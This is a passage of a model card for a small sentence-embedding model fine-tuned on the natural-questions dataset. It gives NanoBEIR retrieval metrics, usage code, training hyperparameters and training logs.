value: 0.32
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.44
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.5
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.62
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.32
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.28
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.26799999999999996
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.24799999999999997
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.012478860049424716
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.04039987203152191
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.05777310273396785
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.09431894225488731
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.264566207848617
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.3937222222222222
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.1009051776502821
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoNQ
type: NanoNQ
metrics:
- type: cosine_accuracy@1
value: 0.54
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.64
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.74
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.54
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.22
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.15200000000000002
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.08
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.51
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.61
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.68
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.72
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.6242150636035374
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6056666666666667
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.5978891331631784
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoQuoraRetrieval
type: NanoQuoraRetrieval
metrics:
- type: cosine_accuracy@1
value: 0.94
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.96
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 1.0
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 1.0
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.94
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3999999999999999
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.256
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.13599999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.8273333333333333
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.9253333333333333
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.976
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.9933333333333334
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.9565745436598582
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.9590000000000001
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.9352719303046889
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoSCIDOCS
type: NanoSCIDOCS
metrics:
- type: cosine_accuracy@1
value: 0.46
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.7
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.78
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.92
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.46
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3533333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.28
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.18599999999999997
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.09566666666666666
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.21666666666666665
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.2866666666666666
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.38066666666666665
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.37575085819520465
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.5963809523809522
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.2885384308634827
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoArguAna
type: NanoArguAna
metrics:
- type: cosine_accuracy@1
value: 0.2
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.6
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.86
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.2
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.2
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.14
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.08599999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.2
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.6
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.7
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.86
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5214752971348396
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.41396825396825393
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.4200848216111374
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoSciFact
type: NanoSciFact
metrics:
- type: cosine_accuracy@1
value: 0.52
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.66
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.78
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.8
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.52
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.23333333333333336
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.16799999999999998
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.09
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.485
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.64
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.755
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.79
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.6502419149717973
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6123333333333334
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.6064036623574295
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoTouche2020
type: NanoTouche2020
metrics:
- type: cosine_accuracy@1
value: 0.5510204081632653
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.8163265306122449
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.8775510204081632
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 1.0
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.5510204081632653
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.5374149659863945
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.5020408163265306
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.43061224489795924
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.04049297815629291
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.11569609914870749
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.17697471708626475
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.2847992664462136
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.48122759937817366
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7012066731454487
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.37319563903770475
name: Cosine Map@100
- task:
type: nano-beir
name: Nano BEIR
dataset:
name: NanoBEIR mean
type: NanoBEIR_mean
metrics:
- type: cosine_accuracy@1
value: 0.5070015698587127
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.6935635792778648
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7613500784929356
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.8553846153846153
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.5070015698587127
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3167242281527996
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.24508006279434855
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.17204709576138144
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.3039290856905001
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.45440661761356566
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.520387215058305
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.6069600823070304
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5567734477417906
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6169408063591738
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.47766360649235273
name: Cosine Map@100
---
# SentenceTransformer based on intfloat/multilingual-e5-small
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [intfloat/multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) on the [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions) dataset. It maps sentences & paragraphs to a 384-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [intfloat/multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) <!-- at revision c007d7ef6fd86656326059b28395a7a03a7c5846 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 384 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions)
- **Language:** en
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'BertModel'})
(1): Pooling({'word_embedding_dimension': 384, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("Caesarisnotasalad/test")
# Run inference
sentences = [
'on what basis did the bishop of rome claim authority over other bishops',
"Papal primacy Because of its association with the supposed position of Peter among the Apostles, the function that, within the Roman Catholic Church, is exercised by the Bishop of Rome among the bishops as a whole is referred to as the Petrine function, and is generally believed to be of divine institution, in the sense that the historical and sociological factors that influenced its development are seen as guided by the Holy Spirit. Not all Roman Catholic theologians see a special providential providence as responsible for the result, but most see the papacy, regardless of its origin, as now essential to the Church's structure.[36]",
"Fifty Shades Darker Christian takes Ana to the boathouse, which has been decorated with flowers and soft lights. He proposes properly with a ring and Ana accepts. Outside the Greys' mansion, Jack Hyde secretly watches the party; he is the one who sabotaged Christian's helicopter and he has sworn revenge.",
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# (3, 384)
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.5492, 0.0268],
# [ 0.5492, 1.0000, -0.0234],
# [ 0.0268, -0.0234, 1.0000]])
```
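Beyond pairwise similarity, the same embeddings can be used for simple semantic search. The sketch below is illustrative only: the corpus and query are made up, and the ranking relies on the model's cosine similarity function.
```python
from sentence_transformers import SentenceTransformer

model = SentenceTransformer("Caesarisnotasalad/test")

# Illustrative corpus and query (not taken from the training data)
corpus = [
    "Papal primacy refers to the authority of the Bishop of Rome over the whole Church.",
    "Global wool production is about 2 million tonnes per year.",
    "Richmond won the 2017 AFL Grand Final against Adelaide.",
]
query = "how much wool is produced worldwide each year"

# Encode the query and corpus, then rank documents by cosine similarity
query_embedding = model.encode(query)
corpus_embeddings = model.encode(corpus)
scores = model.similarity(query_embedding, corpus_embeddings)  # shape: [1, 3]
best = scores.argmax().item()
print(corpus[best])
```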
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
## Evaluation
### Metrics
#### Information Retrieval
* Datasets: `NanoClimateFEVER`, `NanoDBPedia`, `NanoFEVER`, `NanoFiQA2018`, `NanoHotpotQA`, `NanoMSMARCO`, `NanoNFCorpus`, `NanoNQ`, `NanoQuoraRetrieval`, `NanoSCIDOCS`, `NanoArguAna`, `NanoSciFact` and `NanoTouche2020`
* Evaluated with [<code>InformationRetrievalEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.InformationRetrievalEvaluator)
| Metric | NanoClimateFEVER | NanoDBPedia | NanoFEVER | NanoFiQA2018 | NanoHotpotQA | NanoMSMARCO | NanoNFCorpus | NanoNQ | NanoQuoraRetrieval | NanoSCIDOCS | NanoArguAna | NanoSciFact | NanoTouche2020 |
|:--------------------|:-----------------|:------------|:-----------|:-------------|:-------------|:------------|:-------------|:-----------|:-------------------|:------------|:------------|:------------|:---------------|
| cosine_accuracy@1 | 0.2 | 0.68 | 0.66 | 0.38 | 0.76 | 0.38 | 0.32 | 0.54 | 0.94 | 0.46 | 0.2 | 0.52 | 0.551 |
| cosine_accuracy@3 | 0.48 | 0.9 | 0.88 | 0.52 | 0.86 | 0.56 | 0.44 | 0.64 | 0.96 | 0.7 | 0.6 | 0.66 | 0.8163 |
| cosine_accuracy@5 | 0.6 | 0.92 | 0.92 | 0.56 | 0.92 | 0.64 | 0.5 | 0.7 | 1.0 | 0.78 | 0.7 | 0.78 | 0.8776 |
| cosine_accuracy@10 | 0.72 | 0.94 | 0.98 | 0.72 | 0.94 | 0.88 | 0.62 | 0.74 | 1.0 | 0.92 | 0.86 | 0.8 | 1.0 |
| cosine_precision@1 | 0.2 | 0.68 | 0.66 | 0.38 | 0.76 | 0.38 | 0.32 | 0.54 | 0.94 | 0.46 | 0.2 | 0.52 | 0.551 |
| cosine_precision@3 | 0.18 | 0.5867 | 0.2933 | 0.2333 | 0.4133 | 0.1867 | 0.28 | 0.22 | 0.4 | 0.3533 | 0.2 | 0.2333 | 0.5374 |
| cosine_precision@5 | 0.144 | 0.508 | 0.192 | 0.164 | 0.284 | 0.128 | 0.268 | 0.152 | 0.256 | 0.28 | 0.14 | 0.168 | 0.502 |
| cosine_precision@10 | 0.104 | 0.436 | 0.102 | 0.104 | 0.146 | 0.088 | 0.248 | 0.08 | 0.136 | 0.186 | 0.086 | 0.09 | 0.4306 |
| cosine_recall@1 | 0.1083 | 0.0864 | 0.6267 | 0.1987 | 0.38 | 0.38 | 0.0125 | 0.51 | 0.8273 | 0.0957 | 0.2 | 0.485 | 0.0405 |
| cosine_recall@3 | 0.239 | 0.1667 | 0.8467 | 0.3268 | 0.62 | 0.56 | 0.0404 | 0.61 | 0.9253 | 0.2167 | 0.6 | 0.64 | 0.1157 |
| cosine_recall@5 | 0.304 | 0.2144 | 0.9033 | 0.3609 | 0.71 | 0.64 | 0.0578 | 0.68 | 0.976 | 0.2867 | 0.7 | 0.755 | 0.177 |
| cosine_recall@10 | 0.4113 | 0.3104 | 0.9433 | 0.4923 | 0.73 | 0.88 | 0.0943 | 0.72 | 0.9933 | 0.3807 | 0.86 | 0.79 | 0.2848 |
| **cosine_ndcg@10** | **0.3105** | **0.5588** | **0.8018** | **0.3959** | **0.7028** | **0.5942** | **0.2646** | **0.6242** | **0.9566** | **0.3758** | **0.5215** | **0.6502** | **0.4812** |
| cosine_mrr@10 | 0.3614 | 0.7917 | 0.774 | 0.4771 | 0.8262 | 0.5075 | 0.3937 | 0.6057 | 0.959 | 0.5964 | 0.414 | 0.6123 | 0.7012 |
| cosine_map@100 | 0.239 | 0.4081 | 0.7482 | 0.3325 | 0.645 | 0.5145 | 0.1009 | 0.5979 | 0.9353 | 0.2885 | 0.4201 | 0.6064 | 0.3732 |
#### Nano BEIR
* Dataset: `NanoBEIR_mean`
* Evaluated with [<code>NanoBEIREvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.NanoBEIREvaluator) with these parameters:
```json
{
"dataset_names": [
"climatefever",
"dbpedia",
"fever",
"fiqa2018",
"hotpotqa",
"msmarco",
"nfcorpus",
"nq",
"quoraretrieval",
"scidocs",
"arguana",
"scifact",
"touche2020"
]
}
```
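For reference, a minimal sketch of how such an evaluation could be reproduced with the `NanoBEIREvaluator` is shown below. The three dataset names are an arbitrary subset of the list above, and the result key follows the column naming used in the training logs further down.
```python
from sentence_transformers import SentenceTransformer
from sentence_transformers.evaluation import NanoBEIREvaluator

model = SentenceTransformer("Caesarisnotasalad/test")

# Evaluate on a subset of the NanoBEIR datasets listed above
evaluator = NanoBEIREvaluator(dataset_names=["msmarco", "nq", "scifact"])
results = evaluator(model)
print(results["NanoBEIR_mean_cosine_ndcg@10"])
```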
| Metric | Value |
|:--------------------|:-----------|
| cosine_accuracy@1 | 0.507 |
| cosine_accuracy@3 | 0.6936 |
| cosine_accuracy@5 | 0.7614 |
| cosine_accuracy@10 | 0.8554 |
| cosine_precision@1 | 0.507 |
| cosine_precision@3 | 0.3167 |
| cosine_precision@5 | 0.2451 |
| cosine_precision@10 | 0.172 |
| cosine_recall@1 | 0.3039 |
| cosine_recall@3 | 0.4544 |
| cosine_recall@5 | 0.5204 |
| cosine_recall@10 | 0.607 |
| **cosine_ndcg@10** | **0.5568** |
| cosine_mrr@10 | 0.6169 |
| cosine_map@100 | 0.4777 |
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### natural-questions
* Dataset: [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions) at [f9e894e](https://huggingface.co/datasets/sentence-transformers/natural-questions/tree/f9e894e1081e206e577b4eaa9ee6de2b06ae6f17)
* Size: 100,231 training samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 10 tokens</li><li>mean: 13.24 tokens</li><li>max: 24 tokens</li></ul> | <ul><li>min: 19 tokens</li><li>mean: 148.48 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:----------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>when did richmond last play in a preliminary final</code> | <code>Richmond Football Club Richmond began 2017 with 5 straight wins, a feat it had not achieved since 1995. A series of close losses hampered the Tigers throughout the middle of the season, including a 5-point loss to the Western Bulldogs, 2-point loss to Fremantle, and a 3-point loss to the Giants. Richmond ended the season strongly with convincing victories over Fremantle and St Kilda in the final two rounds, elevating the club to 3rd on the ladder. Richmond's first final of the season against the Cats at the MCG attracted a record qualifying final crowd of 95,028; the Tigers won by 51 points. Having advanced to the first preliminary finals for the first time since 2001, Richmond defeated Greater Western Sydney by 36 points in front of a crowd of 94,258 to progress to the Grand Final against Adelaide, their first Grand Final appearance since 1982. The attendance was 100,021, the largest crowd to a grand final since 1986. The Crows led at quarter time and led by as many as 13, but the Tig...</code> |
| <code>who sang what in the world's come over you</code> | <code>Jack Scott (singer) At the beginning of 1960, Scott again changed record labels, this time to Top Rank Records.[1] He then recorded four Billboard Hot 100 hits – "What in the World's Come Over You" (#5), "Burning Bridges" (#3) b/w "Oh Little One" (#34), and "It Only Happened Yesterday" (#38).[1] "What in the World's Come Over You" was Scott's second gold disc winner.[6] Scott continued to record and perform during the 1960s and 1970s.[1] His song "You're Just Gettin' Better" reached the country charts in 1974.[1] In May 1977, Scott recorded a Peel session for BBC Radio 1 disc jockey, John Peel.</code> |
| <code>who produces the most wool in the world</code> | <code>Wool Global wool production is about 2 million tonnes per year, of which 60% goes into apparel. Wool comprises ca 3% of the global textile market, but its value is higher owing to dying and other modifications of the material.[1] Australia is a leading producer of wool which is mostly from Merino sheep but has been eclipsed by China in terms of total weight.[30] New Zealand (2016) is the third-largest producer of wool, and the largest producer of crossbred wool. Breeds such as Lincoln, Romney, Drysdale, and Elliotdale produce coarser fibers, and wool from these sheep is usually used for making carpets.</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
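As a rough illustration (not the exact training script), the dataset and loss above could be set up as follows; the base checkpoint is the one named in the Model Description.
```python
from datasets import load_dataset
from sentence_transformers import SentenceTransformer
from sentence_transformers.losses import CachedMultipleNegativesRankingLoss

model = SentenceTransformer("intfloat/multilingual-e5-small")

# Question-answer pairs used as (anchor, positive)
train_dataset = load_dataset("sentence-transformers/natural-questions", split="train")

# In-batch-negatives loss with gradient caching, matching the parameters above
loss = CachedMultipleNegativesRankingLoss(model, scale=20.0, mini_batch_size=32)
```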
### Training Hyperparameters
#### Non-Default Hyperparameters
- `overwrite_output_dir`: True
- `per_device_train_batch_size`: 1024
- `learning_rate`: 0.0002
- `num_train_epochs`: 1
- `lr_scheduler_type`: cosine
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
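These non-default values map roughly onto `SentenceTransformerTrainingArguments` as sketched below. This continues the dataset-and-loss sketch above (it assumes `model`, `train_dataset`, and `loss` from that snippet), and the `output_dir` is a hypothetical placeholder.
```python
from sentence_transformers import SentenceTransformerTrainer, SentenceTransformerTrainingArguments
from sentence_transformers.training_args import BatchSamplers

# Mirrors the non-default hyperparameters listed above
args = SentenceTransformerTrainingArguments(
    output_dir="models/multilingual-e5-small-nq",  # hypothetical output path
    overwrite_output_dir=True,
    per_device_train_batch_size=1024,
    learning_rate=2e-4,
    num_train_epochs=1,
    lr_scheduler_type="cosine",
    warmup_ratio=0.1,
    fp16=True,
    batch_sampler=BatchSamplers.NO_DUPLICATES,
)

trainer = SentenceTransformerTrainer(model=model, args=args, train_dataset=train_dataset, loss=loss)
trainer.train()
```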
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: True
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 1024
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 0.0002
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: cosine
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | NanoClimateFEVER_cosine_ndcg@10 | NanoDBPedia_cosine_ndcg@10 | NanoFEVER_cosine_ndcg@10 | NanoFiQA2018_cosine_ndcg@10 | NanoHotpotQA_cosine_ndcg@10 | NanoMSMARCO_cosine_ndcg@10 | NanoNFCorpus_cosine_ndcg@10 | NanoNQ_cosine_ndcg@10 | NanoQuoraRetrieval_cosine_ndcg@10 | NanoSCIDOCS_cosine_ndcg@10 | NanoArguAna_cosine_ndcg@10 | NanoSciFact_cosine_ndcg@10 | NanoTouche2020_cosine_ndcg@10 | NanoBEIR_mean_cosine_ndcg@10 |
|:------:|:----:|:-------------:|:-------------------------------:|:--------------------------:|:------------------------:|:---------------------------:|:---------------------------:|:--------------------------:|:---------------------------:|:---------------------:|:---------------------------------:|:--------------------------:|:--------------------------:|:--------------------------:|:-----------------------------:|:----------------------------:|
| 0.1020 | 10 | 4.5978 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.2041 | 20 | 3.903 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.3061 | 30 | 2.5388 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.4082 | 40 | 1.0295 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.5102 | 50 | 0.5117 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.6122 | 60 | 0.4063 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.7143 | 70 | 0.3684 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.8163 | 80 | 0.3592 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.9184 | 90 | 0.3371 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| -1 | -1 | - | 0.3105 | 0.5588 | 0.8018 | 0.3959 | 0.7028 | 0.5942 | 0.2646 | 0.6242 | 0.9566 | 0.3758 | 0.5215 | 0.6502 | 0.4812 | 0.5568 |
### Framework Versions
- Python: 3.12.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.1
- PyTorch: 2.8.0+cu126
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.0
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
